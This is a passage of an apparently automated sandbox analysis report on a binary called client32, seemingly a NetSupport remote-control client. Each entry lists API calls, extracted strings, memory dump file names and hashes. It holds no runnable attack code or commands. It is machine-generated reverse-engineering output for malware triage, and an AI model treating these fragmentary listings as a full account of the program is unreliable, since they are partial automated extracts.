                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                                                    • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                                    • API String ID: 1609618855-357498123
                                                                                                                                                    • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                                                    • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                                                                                    • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                                                    • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                                                                                                    Function 6CA96BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96BD5
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96C26
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 6CA96C5B
                                                                                                                                                      • Part of subcall function 6CA96940: GetTickCount.KERNEL32 ref: 6CA96950
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000314,?), ref: 6CA96C7C
                                                                                                                                                    • _memmove.LIBCMT ref: 6CA96C93
                                                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6CA96CB4
                                                                                                                                                    • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6CA96CD9
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96CEC
                                                                                                                                                    • _calloc.LIBCMT ref: 6CA96D76
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96DF3
                                                                                                                                                    • InterlockedExchange.KERNEL32(03822D3A,00000000), ref: 6CA96E01
                                                                                                                                                    • _calloc.LIBCMT ref: 6CA96E33
                                                                                                                                                    • _memmove.LIBCMT ref: 6CA96E47
                                                                                                                                                    • InterlockedDecrement.KERNEL32(03822CE2), ref: 6CA96EC3
                                                                                                                                                    • SetEvent.KERNEL32(0000031C), ref: 6CA96ECF
                                                                                                                                                    • _memmove.LIBCMT ref: 6CA96EF4
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96F4F
                                                                                                                                                    • InterlockedExchange.KERNEL32(03822C82,-6CACA188), ref: 6CA96F60
                                                                                                                                                    Strings
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6CA96E62
                                                                                                                                                    • ResumeTimeout, xrefs: 6CA96BBA
                                                                                                                                                    • ProcessMessage returned FALSE. Terminating connection, xrefs: 6CA96F25
                                                                                                                                                    • ReadMessage returned FALSE. Terminating connection, xrefs: 6CA96F3A
                                                                                                                                                    • httprecv, xrefs: 6CA96BDD
                                                                                                                                                    • FALSE, xrefs: 6CA96E67
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                                                                    • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                                                    • API String ID: 1449423504-919941520
                                                                                                                                                    • Opcode ID: 93c6792346eada87d0ad622549458b43d103ac93c474c75b3beb57113fcbbbf5
                                                                                                                                                    • Instruction ID: a2ae4cdcec17aedc33514dc8db8ca586f1eb3fb3128d4a27bf2011a2987b5221
                                                                                                                                                    • Opcode Fuzzy Hash: 93c6792346eada87d0ad622549458b43d103ac93c474c75b3beb57113fcbbbf5
                                                                                                                                                    • Instruction Fuzzy Hash: F6B1F1B1E102589BDB24DF64CD49BD9B3B4AF08348F04819AE589E7740D7B49BC9CF91
                                                                                                                                                    Function 11030EF3 Relevance: 40.6, APIs: 10, Strings: 13, Instructions: 350registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                                                                                      • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                                                                    • InterlockedExchange.KERNEL32(02E68D80,00001388), ref: 110313BA
                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                                                                      • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                                                                                                    • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                                                                                                    • API String ID: 1620732580-3468083601
                                                                                                                                                    • Opcode ID: 59eca2369bb3a4e4a2a112550fa64f7f872260151d0ac89f22c24856b26732e2
                                                                                                                                                    • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                                                                                                    • Opcode Fuzzy Hash: 59eca2369bb3a4e4a2a112550fa64f7f872260151d0ac89f22c24856b26732e2
                                                                                                                                                    • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51
                                                                                                                                                    Function 110869D0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                                                    • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                                                    • API String ID: 2201880244-3035937465
                                                                                                                                                    • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                                                                                    • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                                                                                                    • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                                                                                    • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                                                                                                    Function 11142400 Relevance: 37.4, APIs: 3, Strings: 18, Instructions: 677registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                    • API String ID: 3535843008-1834795898
                                                                                                                                                    • Opcode ID: c3b0beb785d61d14bc09d6443188457746b9abe6a1dfff17b4c73e4d473e28b0
                                                                                                                                                    • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                                                                                                    • Opcode Fuzzy Hash: c3b0beb785d61d14bc09d6443188457746b9abe6a1dfff17b4c73e4d473e28b0
                                                                                                                                                    • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61
                                                                                                                                                    Function 11074CD0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                                                                                                    • _strncpy.LIBCMT ref: 11074E38
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 11075038
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CritiusernitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                                                                    • API String ID: 703120326-1497550179
                                                                                                                                                    • Opcode ID: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                                                                                                    • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                                                                                                    • Opcode Fuzzy Hash: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                                                                                                    • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65
                                                                                                                                                    Function 11139A70 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                                                                                      • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                      • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                                                                      • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                    • PostMessageA.USER32(000A0036,000006CF,00000007,00000000), ref: 11139C4F
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • SetWindowTextA.USER32(000A0036,00000000), ref: 11139CF7
                                                                                                                                                    • IsWindowVisible.USER32(000A0036), ref: 11139DBC
                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
                                                                                                                                                    • IsWindowVisible.USER32(000A0036), ref: 11139DEA
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                                                                                                    • EnableWindow.USER32(000A0036,00000001), ref: 11139E27
                                                                                                                                                    • IsWindowVisible.USER32(000A0036), ref: 11139E78
                                                                                                                                                    • IsWindowVisible.USER32(000A0036), ref: 11139E85
                                                                                                                                                    • EnableWindow.USER32(000A0036,00000000), ref: 11139E99
                                                                                                                                                    • EnableWindow.USER32(000A0036,00000000), ref: 11139DFF
                                                                                                                                                      • Part of subcall function 11132120: ShowWindow.USER32(000A0036,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                                                                                    • EnableWindow.USER32(000A0036,00000001), ref: 11139EAD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                                                                    • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                                    • API String ID: 3453649892-3803836183
                                                                                                                                                    • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                                                                                    • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                                                                                                    • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                                                                                    • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791
                                                                                                                                                    Function 110305F5 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 149windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wsprintfA.USER32 ref: 11030645
                                                                                                                                                    • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostwsprintf
                                                                                                                                                    • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                                                                                    • API String ID: 875889313-3431570279
                                                                                                                                                    • Opcode ID: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                                                                                                    • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                                                                                    • Opcode Fuzzy Hash: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                                                                                                    • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                                                                                                    Function 110310D5 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 315COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
